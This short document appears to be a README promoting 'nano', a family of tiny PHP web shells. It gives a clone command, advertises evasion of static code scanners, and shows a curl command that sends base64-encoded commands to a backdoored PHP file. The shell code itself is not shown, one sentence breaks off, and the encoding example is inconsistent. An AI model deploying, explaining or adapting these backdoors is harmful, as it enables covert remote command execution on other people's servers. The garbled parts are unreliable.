nano: stealth PHP web shells
Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient.
Note: You may need to tweak some parts of the code if it doesn’t work out for yours.
For example, if short tags are disabled, you will need to replace <? with <?php.
git clone https://github.com/UltimateHackers/nano.git
- 35 bytes in size
- Can’t be detected by static code scanners
- Supports authentication
f is for function
c is for command
p is for password
For example, the code below will execute the
- 93 bytes in size
- Fully Undetectable
This one a bit complex.
Let’s say you want to run system(ls) so write it as system~ls and then base64 encode it i.e. c3lzdGVtKGxzKQ==
Now add any 1 character at the start of it. Let say ‘x’ so it will be xc3lzdGVtKGxzKQ==
Now open your terminal and type the following command
curl -H ‘x: xc3lzdGVtKGxzKQ==’ http://example.com/backdoored.php
Too much work? You can use the handler instead.